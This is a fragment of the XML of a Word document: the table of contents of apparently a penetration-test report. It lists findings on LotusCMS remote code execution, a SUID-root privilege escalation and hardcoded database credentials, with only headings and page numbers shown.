              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA2FC37" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906575" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AB282EE" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906576" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D55B0BD" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906577" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B6A190E" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906578" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="504FF21F" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906579" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding F2: Pre-authentication remote code execution in LotusCMS 3.0 web application</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906579 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26086668" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906580" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906580 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B4D60C6" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906581" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906581 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52866039" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906582" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906582 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="082651D0" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906583" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906583 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="411D49A4" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906584" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906584 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B9EF172" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906585" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding F3: Non-standard SUID-root binary in /usr/local/bin enables privilege escalation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906585 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BA1663A" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906586" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906586 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39DB814F" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906587" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906587 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34FC7D0E" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906588" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906588 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55565541" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906589" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906589 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C119047" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906590" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906590 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78D8E2AF" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906591" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding F4: Database administrator credentials hardcoded in vendor application configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906591 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="337D4D2F" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906592" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906592 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6906D66B" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906593" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906593 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="465CB89D" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906594" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
